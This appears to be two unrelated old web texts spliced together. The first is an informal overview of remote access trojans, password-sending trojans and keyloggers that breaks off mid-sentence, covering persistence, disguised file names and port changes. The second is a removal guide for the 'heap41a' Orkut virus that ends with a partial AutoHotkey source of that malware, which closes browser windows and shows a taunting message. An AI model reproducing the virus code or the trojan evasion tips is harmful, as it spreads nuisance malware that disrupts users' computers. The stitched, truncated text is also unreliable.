Remote Access Trojans


These trojans are the most popular trojans now.
Everyone wants to have such trojan because he
or she want to have access to their victim's hard drive.
The RAT'S (remote access trojans)are very
simple to use.Just make someone run the server
and you get the victim's IP and you have FULL
access to his or her computer.They you can
almost everything it depends of the trojan you use.
But the RAT'S have the common remote access trojan functions like:
keylogger,upload and download function,
make a screen shot and so on.Some people use the
trojans for malicious purposes.
They want just to delete and delete.This is lame.
There are many programs out there
that detects the most common trojans,but new trojans are
coming every day and these programs are not the maximum defense.
The trojans do always the same things.
If the trojan restart every time Windows is loaded that
means it put something in the registry
or in win.ini or in other system file so the trojan can restart.
Also the trojans create some file in
the WINDOWS\SYSTEM directory.The file is always looking
to be something that the victim will think
is a normal WINDOWS executable.Most trojans hide
from the Alt+Ctrl+Del menu.This is not
good because there are people who use only this way to see
which process are running.There are programs
that will tell me you exactly the process and the
file from where it comes.Yeah but some trojans
as I told you use fake names and it's a little hard
for some people to understand which process
should they kill.The remote access trojans opens
a port on your computer letting everyone to connect.
Some trojans has options like change the port
and put a password so only the guy that infect you
will be able to use the computer.The change
port option is very good because I'm sure you
don't want your victim to see that port 31337 is open
on their computer.Remote access trojans are
appearing every day and they will continue to appear.
For those that use such trojans: BE CAREFUL
you can infect yourself and they the victim you
wanted to destroy will revenge and you'll be sorry.
---------------------------------------
Password Sending Trojans

The purpose of these trojans is to rip all cached
passwords and send them to specified e-mail
without letting the victim about the e-mail.
Most of these trojans don't restart every time Windows
is loaded and most of them use port 25 to
send the e-mail.There are such trojans that e-mail
other information too like ICQ number
computer info and so on.These trojans are dangerous if
you have any passwords cached anywhere on your computer.
----------------------------------------
Keyloggers

These trojans are very simple.The only one thing
they do is to log the keys that the victim is pressing
and then check for passwords in the log file.
In the most cases these trojans restart every
time Windows is loaded.They have options
like online and offline recording.In the online recording
they know that the victim is online and
they record everything.But in the offline recording
everything written after Windows start is

Many of members of Orkut Are suffering From this Virus Muhaha and it says something like this you are banned and like that Bla Bla Bla
so here how to Remove it

It makes a folder named heap41a in the C:\ drive with attributes S (System file) and H (Hidden file).If your pc is infected by this virus then just boot it in safe mode,goto cmd prompt and at C:\> type attrib -S -H heap41a to make this folder visible and then just delete this folder. Either you Go with A registry Cleaner to Remove it or here is the Easiest Method.


Open task manager>process tab>there if you find svchost.exe befor your user name (remember also system will use svchost.exe don't end that) just give end process for that then go to run and type C://heap41a and delete all files of that folder.

Here Is the Code of that Virus >>

ifwinactive ahk_class IEFrame
{

ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{